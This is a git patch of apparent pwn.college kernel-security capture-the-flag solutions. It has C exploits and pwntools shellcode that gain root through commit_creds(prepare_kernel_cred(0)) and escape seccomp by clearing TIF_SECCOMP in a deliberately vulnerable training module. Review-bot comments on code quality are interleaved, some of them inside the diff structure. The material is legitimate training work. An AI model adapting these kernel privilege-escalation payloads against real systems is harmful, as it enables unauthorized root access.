From d61516563988cb6dce687c9607a558efc821a536 Mon Sep 17 00:00:00 2001
From: Jack Ren
Date: Fri, 27 Sep 2024 16:13:01 +0800
Subject: [PATCH] Added Level 3.0 ~ 8.1 of KernelSecurity in PwnCollege

---
 PwnCollege/KernelSecurity/Level3.0/exploit.c | 8 +++++
 PwnCollege/KernelSecurity/Level3.1/exploit.c | 8 +++++
 PwnCollege/KernelSecurity/Level4.0/exploit.c | 10 ++++++
 PwnCollege/KernelSecurity/Level4.1/exploit.c | 10 ++++++
 PwnCollege/KernelSecurity/Level5.0/exploit.c | 10 ++++++
 PwnCollege/KernelSecurity/Level5.1/exploit.c | 10 ++++++
 PwnCollege/KernelSecurity/Level6.0/exploit.c | 24 +++++++++++++
 PwnCollege/KernelSecurity/Level7.0/exploit.c | 34 ++++++++++++++++++
 .../KernelSecurity/Level8.0/shellcode.py | 36 +++++++++++++++++++
 .../KernelSecurity/Level8.0/test_seccomp.c | 8 +++++
 PwnCollege/KernelSecurity/common.py | 30 ++++++++++++++++
 11 files changed, 188 insertions(+)
 create mode 100644 PwnCollege/KernelSecurity/Level3.0/exploit.c
 create mode 100644 PwnCollege/KernelSecurity/Level3.1/exploit.c
 create mode 100644 PwnCollege/KernelSecurity/Level4.0/exploit.c
 create mode 100644 PwnCollege/KernelSecurity/Level4.1/exploit.c
 create mode 100644 PwnCollege/KernelSecurity/Level5.0/exploit.c
 create mode 100644 PwnCollege/KernelSecurity/Level5.1/exploit.c
 create mode 100644 PwnCollege/KernelSecurity/Level6.0/exploit.c
 create mode 100644 PwnCollege/KernelSecurity/Level7.0/exploit.c
 create mode 100644 PwnCollege/KernelSecurity/Level8.0/shellcode.py
 create mode 100644 PwnCollege/KernelSecurity/Level8.0/test_seccomp.c
 create mode 100644 PwnCollege/KernelSecurity/common.py

diff --git a/PwnCollege/KernelSecurity/Level3.0/exploit.c b/PwnCollege/KernelSecurity/Level3.0/exploit.c
new file mode 100644
index 0000000..4f6cb6c
--- /dev/null
+++ b/PwnCollege/KernelSecurity/Level3.0/exploit.c
@@ -0,0 +1,8 @@
+#include
+#include
+#include
+int main() {
+ int fd = open("/proc/pwncollege", O_WRONLY);
+ write(fd, "oiwqgsfsdekebbgi", 0x10);
+ execve("/bin/bash", NULL, NULL);
+}
\ No newline at end of file
diff --git a/PwnCollege/KernelSecurity/Level3.1/exploit.c b/PwnCollege/KernelSecurity/Level3.1/exploit.c
new file mode 100644
index 0000000..3216136
--- /dev/null
+++ b/PwnCollege/KernelSecurity/Level3.1/exploit.c
@@ -0,0 +1,8 @@
+#include
+#include
+#include
+int main() {
+ int fd = open("/proc/pwncollege", O_WRONLY);
+ write(fd, "ysrxhmxtsfctmnuv", 0x10);
+ execve("/bin/bash", NULL, NULL);
+}
\ No newline at end of file
diff --git a/PwnCollege/KernelSecurity/Level4.0/exploit.c b/PwnCollege/KernelSecurity/Level4.0/exploit.c
new file mode 100644
index 0000000..cea8e50
--- /dev/null
+++ b/PwnCollege/KernelSecurity/Level4.0/exploit.c
@@ -0,0 +1,10 @@
+#include
+#include
+#include
+#include
+
+int main() {
+ int fd = open("/proc/pwncollege", O_WRONLY);
+ ioctl(fd, 1337, "owibidryoofhkxuo");
+ execve("/bin/bash", NULL, NULL);
+}
\ No newline at end of file
diff --git a/PwnCollege/KernelSecurity/Level4.1/exploit.c b/PwnCollege/KernelSecurity/Level4.1/exploit.c
new file mode 100644
index 0000000..aa46ec1
--- /dev/null
+++ b/PwnCollege/KernelSecurity/Level4.1/exploit.c
@@ -0,0 +1,10 @@
+#include
+#include
+#include
+#include
+
+int main() {
+ int fd = open("/proc/pwncollege", O_WRONLY);
+ ioctl(fd, 1337, "amykdifilzqobpdg");
+ execve("/bin/bash", NULL, NULL);
+}
\ No newline at end of file
diff --git a/PwnCollege/KernelSecurity/Level5.0/exploit.c b/PwnCollege/KernelSecurity/Level5.0/exploit.c
new file mode 100644
index 0000000..a1fd2ad
--- /dev/null
+++ b/PwnCollege/KernelSecurity/Level5.0/exploit.c
@@ -0,0 +1,10 @@
+#include
+#include
+#include
+#include
+
+int main() {
+ int fd = open("/proc/pwncollege", O_WRONLY);
+ ioctl(fd, 1337, 0xffffffffc0000000ull + 0x8edull);
+ execve("/bin/bash", NULL, NULL);
+}
\ No newline at end of file
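Review bot: The `open()` result on the first line of `main` is never checked, so when `/proc/pwncollege` is missing or not writable `fd` is -1, the `write()` fails silently and `execve` still runs as if the setup had succeeded; add `if (fd < 0) { perror("open"); return 1; }` and check the `write()` return value as well. The same unchecked `open()` appears in the Level3.1, 4.0, 4.1, 5.0, 5.1, 6.0 and 7.0 hunks, with `ioctl()` in place of `write()` in most of them. Passing `NULL` as `argv` to `execve()` is non-portable — POSIX requires at least a terminating NULL entry — so `char *const argv[] = {"/bin/bash", NULL};` is the conventional form. The `#include` header names are absent in this rendering of the patch, presumably stripped with the angle-bracket markup rather than missing from the file.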
diff --git a/PwnCollege/KernelSecurity/Level5.1/exploit.c b/PwnCollege/KernelSecurity/Level5.1/exploit.c
new file mode 100644
index 0000000..c142b65
--- /dev/null
+++ b/PwnCollege/KernelSecurity/Level5.1/exploit.c
@@ -0,0 +1,10 @@
+#include
+#include
+#include
+#include
+
+int main() {
+ int fd = open("/proc/pwncollege", O_WRONLY);
+ ioctl(fd, 1337, 0xffffffffc0000000ull + 0xc2ull);
+ execve("/bin/bash", NULL, NULL);
+}
\ No newline at end of file
diff --git a/PwnCollege/KernelSecurity/Level6.0/exploit.c b/PwnCollege/KernelSecurity/Level6.0/exploit.c
new file mode 100644
index 0000000..ea147f3
--- /dev/null
+++ b/PwnCollege/KernelSecurity/Level6.0/exploit.c
@@ -0,0 +1,24 @@
+#include
+#include
+#include
+#include
+#include
+
+__attribute__((naked))
+void shellcode() {
+ asm volatile(
+ "xor %rdi, %rdi\n"
+ "movabs $0xffffffff81089660, %rsi\n"
+ "callq *%rsi\n" // prepare_kernel_cred
+ "movq %rax, %rdi\n"
+ "movabs $0xffffffff81089310, %rsi\n"
+ "callq *%rsi\n" // commit_creds
+ "retq\n"
+ );
+}
+
+int main() {
+ int fd = open("/proc/pwncollege", O_WRONLY);
+ write(fd, (void *)shellcode, 0x1F);
+ execve("/bin/bash", NULL, NULL);
+}
\ No newline at end of file
diff --git a/PwnCollege/KernelSecurity/Level7.0/exploit.c b/PwnCollege/KernelSecurity/Level7.0/exploit.c
new file mode 100644
index 0000000..a391224
--- /dev/null
+++ b/PwnCollege/KernelSecurity/Level7.0/exploit.c
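Review bot: The `0x1F` passed to `write()` in the Level6.0 `main` is an undocumented hand-counted byte length that must equal the assembled size of the naked `shellcode()` function above it, and nothing ties the two together, so any edit to the asm block (or a different assembler encoding) silently truncates or over-reads the function body; the same coupling exists in the Level7.0 hunk, where `args.length = 0x1f` feeds `memcpy`. A comment next to the constant, `/* byte length of shellcode(); recount if the asm block changes */`, makes the dependency visible to the next reader. The two `movabs` immediates in the asm block are likewise bare magic numbers — the trailing `// prepare_kernel_cred` and `// commit_creds` comments on the `callq` lines cover intent, but a note on where the values were obtained would help anyone re-deriving them.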
@@ -0,0 +1,34 @@
+#include
+#include
+#include
+#include
+#include
+#include
+
+struct ioctl_args {
+ uint64_t length;
+ uint8_t shellcode[0x1000];
+ uint64_t codeptr;
+}args;
+
+__attribute__((naked))
+void shellcode() {
+ asm volatile(
+ "xor %rdi, %rdi\n"
+ "movabs $0xffffffff81089660, %rsi\n"
+ "callq *%rsi\n" // prepare_kernel_cred
+ "movq %rax, %rdi\n"
+ "movabs $0xffffffff81089310, %rsi\n"
+ "callq *%rsi\n" // commit_creds
+ "retq\n"
+ );
+}
+
+int main() {
+ args.length = 0x1f;
+ memcpy(args.shellcode, shellcode, args.length);
+ args.codeptr = 0xffffc90000085000ull;
+ int fd = open("/proc/pwncollege", O_WRONLY);
+ ioctl(fd, 1337, &args);
+ execve("/bin/bash", NULL, NULL);
+}
\ No newline at end of file
diff --git a/PwnCollege/KernelSecurity/Level8.0/shellcode.py b/PwnCollege/KernelSecurity/Level8.0/shellcode.py
new file mode 100644
index 0000000..78ad84e
--- /dev/null
+++ b/PwnCollege/KernelSecurity/Level8.0/shellcode.py
@@ -0,0 +1,36 @@
+import sys
+sys.path.append("..")
+
+from pwn import context, shellcraft
+from common import *
+context(arch = 'amd64', os = 'linux')
+
+kernel_assembly = f"""
+/* current->thread_info.flags &= ~(1 << TIF_SECCOMP); */
+mov rdx, gs:0x15d00 /* runtime-relocated offsets */
+mov rax, [rdx]
+and ah, 0xfe
+mov [rdx], rax
+/* commit_creds(prepare_kernel_cred(NULL)); */
+xor rdi, rdi
+movabs rsi, 0xffffffff81089660
+call rsi /* prepare_kernel_cred */
+mov rdi, rax
+movabs rsi, 0xffffffff81089310
+call rsi /* commit_creds */
+ret
+""".strip()
+
+kernel_machine_code = dump_machine_code(kernel_assembly)
+
+user_assembly = f"""
+{shellcraft.amd64.pushstr(kernel_machine_code, append_null=False)}
+{shellcraft.amd64.linux.syscall("SYS_write", 3, "rsp", len(kernel_machine_code))}
+{shellcraft.amd64.linux.cat("/flag")}
+""".strip()
+
+user_machine_code = dump_machine_code(user_assembly)
+
+with open('shellcode.bin', 'wb') as f:
+ f.write(user_machine_code)
+ f.write(b'\xcc' * (0x1000 - len(user_machine_code)))
\ No newline at end of file
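Review bot: The padding expression on the last line of shellcode.py, `b'\xcc' * (0x1000 - len(user_machine_code))`, silently evaluates to `b''` when the assembled code is longer than 0x1000 bytes, so an oversized `shellcode.bin` is written with no error; guard it with `if len(user_machine_code) > 0x1000: raise ValueError("shellcode exceeds 0x1000 bytes")` before the `with` block. `from common import *` also drags `asm`, `disasm`, `util` and `struct` into this module's namespace when only `dump_machine_code` is used — `from common import dump_machine_code` is the explicit form. `sys.path.append("..")` is resolved against the current working directory rather than the script's location, so the `common` import only works when the script is run from its own directory; building the path from `os.path.dirname(__file__)` would remove that dependency. The `f` prefix on `kernel_assembly` is unused (the string has no placeholders) and can be dropped, which also removes the risk of a stray brace in a future asm comment breaking the literal.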
diff --git a/PwnCollege/KernelSecurity/Level8.0/test_seccomp.c b/PwnCollege/KernelSecurity/Level8.0/test_seccomp.c
new file mode 100644
index 0000000..85a95a4
--- /dev/null
+++ b/PwnCollege/KernelSecurity/Level8.0/test_seccomp.c
@@ -0,0 +1,8 @@
+#include
+#include
+#include
+MODULE_LICENSE("GPT");
+
+void* test_unset_seccomp_flag_in_thread_info_flags(void) {
+ return current->thread_info.flags &= ~(1 << TIF_SECCOMP);
+}
\ No newline at end of file
diff --git a/PwnCollege/KernelSecurity/common.py b/PwnCollege/KernelSecurity/common.py
new file mode 100644
index 0000000..f0ace93
--- /dev/null
+++ b/PwnCollege/KernelSecurity/common.py
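Review bot: `MODULE_LICENSE("GPT")` is not a license string the kernel recognizes; an unknown string is treated as proprietary, which taints the kernel when the module is loaded and denies the module access to GPL-only exported symbols, so `MODULE_LICENSE("GPL");` is presumably what was intended. The function returns the value of an `unsigned long` compound assignment through a `void*` return type, an implicit integer-to-pointer conversion that the compiler will warn about; declaring it as returning `unsigned long` matches what the expression actually yields. If this file exists only to be compiled and have its generated code inspected rather than loaded, a one-line comment saying so would explain why there is no `module_init`/`module_exit` pair.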
@@ -0,0 +1,30 @@
+from pwn import asm, disasm, util
+import struct
+
+def i2f(x):
+ return struct.unpack('!d', struct.pack('!Q', x))[0]
+
+def f2i(x):
+ return struct.unpack('!Q', struct.pack('!d', x))[0]
+
+def dump_machine_code(assembly: str):
+ machine_code = asm(assembly)
+ print("Assembly:")
+ print(assembly)
+ print("Byte Array:", list(machine_code))
+ padding = b"\xcc" * ((4 - len(machine_code)) % 4)
+ unpacked_signed_array = util.packing.unpack_many(machine_code + padding, 32, endian='little', sign=True)
+ unpacked_unsigned_array = util.packing.unpack_many(machine_code + padding, 32, endian='little', sign=False)
+ print("Signed DWord Array:", unpacked_signed_array)
+ print("Unsigned DWord Array:", unpacked_unsigned_array)
+ print("Hex DWord Array:", list(map(hex, unpacked_unsigned_array)))
+ padding = b"\xcc" * ((8 - len(machine_code)) % 8)
+ unpacked_signed_array = util.packing.unpack_many(machine_code + padding, 64, endian='little', sign=True)
+ unpacked_unsigned_array = util.packing.unpack_many(machine_code + padding, 64, endian='little', sign=False)
+ print("Signed QWord Array:", unpacked_signed_array)
+ print("Unsigned QWord Array:", unpacked_unsigned_array)
+ print("Hex QWord Array:", list(map(hex, unpacked_unsigned_array)))
+ print("Double Array:", list(map(i2f, unpacked_unsigned_array)))
+ print("Disassembled-assembly:")
+ print(disasm(machine_code))
+ return machine_code
\ No newline at end of file
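Review bot: `dump_machine_code` has no docstring and no return annotation, and the 32-bit and 64-bit sections of its body are the same six lines repeated with a different width and label, so a loop over `((32, "DWord"), (64, "QWord"))` removes the duplication while keeping the output identical (the final "Double Array" line still uses the 64-bit unsigned view, which is what the loop leaves behind). The printing is unconditional, so a caller such as shellcode.py cannot assemble quietly; a keyword-only `verbose=True` parameter would keep the current behavior as the default. `i2f` and `f2i` would also benefit from one-line docstrings stating that they reinterpret the bit pattern of a 64-bit integer as a double and back via a big-endian pack/unpack round trip.
```python
def dump_machine_code(assembly: str) -> bytes:
    """Assemble `assembly`, print the bytes in several integer/float views, and return them."""
    machine_code = asm(assembly)
    # … unchanged: "Assembly:" and "Byte Array:" prints …
    for bits, name in ((32, "DWord"), (64, "QWord")):
        width = bits // 8
        padded = machine_code + b"\xcc" * ((width - len(machine_code)) % width)
        signed = util.packing.unpack_many(padded, bits, endian='little', sign=True)
        unsigned = util.packing.unpack_many(padded, bits, endian='little', sign=False)
        print(f"Signed {name} Array:", signed)
        print(f"Unsigned {name} Array:", unsigned)
        print(f"Hex {name} Array:", list(map(hex, unsigned)))
    # After the loop `unsigned` holds the 64-bit view, matching the original output order.
    print("Double Array:", list(map(i2f, unsigned)))
    # … unchanged: disassembly print and return …
```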